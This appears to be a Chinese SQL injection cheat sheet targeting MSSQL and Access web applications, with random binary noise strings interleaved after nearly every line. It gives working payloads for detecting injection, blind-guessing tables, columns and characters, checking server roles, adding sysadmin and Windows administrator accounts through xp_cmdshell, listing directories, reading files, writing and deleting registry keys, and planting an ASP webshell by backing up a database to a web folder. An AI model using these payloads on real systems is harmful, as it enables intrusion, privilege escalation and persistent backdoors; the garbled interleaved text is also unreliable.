1.判断是否有注入;and 1=1 ;and 1=2 h.?[1h�T4R
2.初步判断是否是mssql ;and user>0 �Q�|���ik\
rM?D7a��{q
3.注入参数是字符'and [查询条件] and ''=' mSj�[t
���
^mJvB[ �u|
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �/yykO�vUO
3LXpe8$l�J
5.判断数据库系统 Ro<!�n>��H
�u^]yz&9V�
;and (select count(*) from sysobjects)>0 mssql ~zm/n�,Epb
h�f?^#=k^
;and (select count(*) from msysobjects)>0 access ;! 9_5Ar%�
`�S~�u4+y]
3P6�'��*pZ
��x.^vWka(
6.猜数据库 ;and (select Count(*) from [数据库名])>0
KbUX�(9+B
�@wF�m])}0
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 z�Hdp'J"��
D4���6|�)-
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �d|o"QYX�
pb�zb�h&�Y
9.(1)猜字段的ascii值(access) ��N�Dg]s2T
DY�07?�x7�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �4z*_,@�OA
Dq?2m�XOqD
(2)猜字段的ascii值(mssql) WuNu}Ibl}m
h�7y*2�:l6
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ��IWWFl6$-
YpKai3 B
10.测试权限结构(mssql) :5*<QJuI#A
�6�=g7|}��
vJ�CL
m/}*
[�.Y=~)7FB
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ho2�0>�vw#
=�
]@xXVf/
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- G�awO>7�w8
q@sH@�-z4]
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- IY19�G� U9
1(?J>{-�lw
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- @i68%6�H`?
��MMAC,��4
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Yq
Fzbm{�\
BdK�t�pj�e
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ��\k�,bz�0
kC�
��k-
;and 1=(select IS_MEMBER('db_owner'));-- {�S}@P~H�=
]�B�sq?e^�
GMNb;D(>K
��
�KC(Ug4
11.添加mssql和系统的帐户 �BJE <~"
VM!x�)i9z�
;exec master.dbo.sp_addlogin username;-- u�l%bo%&~
;exec master.dbo.sp_password null,username,password;-- *�*q/��'�K
L��C7L�O
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- d0��=nAZZ
5oKc=i�X_3
;exec master.dbo.xp_cmdshell 'net user username password @Y,�F&8a�$
UBV�b#F�NF
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- J50 ~B3bj`
_tk5?9Ykn�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- +B �m+Pj�>
�@ �7�?_Yw
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- )1vojp
4Za
o�W[,E�W+u
&�rl>{Uvq�
$Y`a�S�^IW
12.(1)遍历目录 U.�aa� iX7
*X\c�
$�=*
;create table dirs(paths varchar(100), id int) W.|6$h�Rl)
/wTf&_"mTL
;insert dirs exec master.dbo.xp_dirtree 'c:\' [86�'/:L\2
n��sT�|,�O
;and (select top 1 paths from dirs)>0 752wK|o0|;
���c-.>C)�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �3CE8+Pn�T
4I��-p/�&Q
�^��kr)�U8
W/>?1+r.Z�
(2)遍历目录 i�y]}1((hR
$�3TTH�S o
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- i .N1Cv�p&
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 !_9$[�Oq~
h)�rf6�*hw
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
i6d$/�yP"
�lX*;KHT�)
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �HD{`w1vcN
k&/�)g3(N(
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �IDh`0/i]�
�Zir`�I�Q$
SR&
mHI-f0
G�me$�FWa
13.mssql中的存储过程 H/k� W
:k
@vYmk�F��`
xp_regenumvalues 注册表根键, 子键 ~TH5>``;gF
ak)�� -OL1
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 mi<D
bnou
$NT9LtT@�K
xp_regread 根键,子键,键值名 ~5NG�DT#L*
�}�4]�<P�
;exec xp_regread 0f��%:OU5Y
S�;Z3v)E-f
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 o�0�G`�X�n
�i�g}�e�@]
xp_regwrite 根键,子键, 值名, 值类型, 值 9S%�gVNxn�
-FN�6sNvIh
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ox_h9�=$�-
:bR�R�(sP�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 5�e��k��%d
g&3�#�22�z
xp_regdeletevalue 根键,子键,值名 IZ0$=a�B�7
�/i�y*3P,`
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 `4.�s�y +2
O�m2X>/V%C
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 OgN1{vRF�x
L��4pjh&+8
=O�#AOw�`�
rz�}l<t~�H
14.mssql的backup创建webshell 0BB�@��E(*
rm=�~^eB �
use model :{s%=\k {d
{!1n5a3" 1
create table cmd(str image); �g!����p_c
G;HlI�I9x[
insert into cmd(str) values (''); 2c~?UK�[1�
^i+��z_�%V
backup database model to disk='c:\l.asp'; � g1wI/��
k�bYg4t]FH
O;0<�^M/0G
y)/$ge��_U
15.mssql内置函数 ��}��;m7FO
'��?�G[T28
;and (select @@version)>0 获得Windows的版本号 LAY)">*49H
Z!�-<ra�jl
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �)�fMX!#KP
|5I�Y`;+�9
;and (select user_name())>0 爆当前系统的连接用户 N9=r#![>,
dA)4(0o8fD
;and (select db_name())>0 得到当前连接的数据库 <`�xRqe:&9
]�X:
r�by$
jqG��o�-C~
;�2A�d]�)�
16.简洁的webshell �JXY�!c�\,
nG�^M 2)(8
use model @�CaD8�%j{
��sK �1m9�
create table cmd(str image); @b!R�2��Yq
�c�,+(FQ9�
insert into cmd(str) values (''); �a4jn��u:e
aC�,vh1")F
backup database model to disk='g:\wwwtest\l.asp';
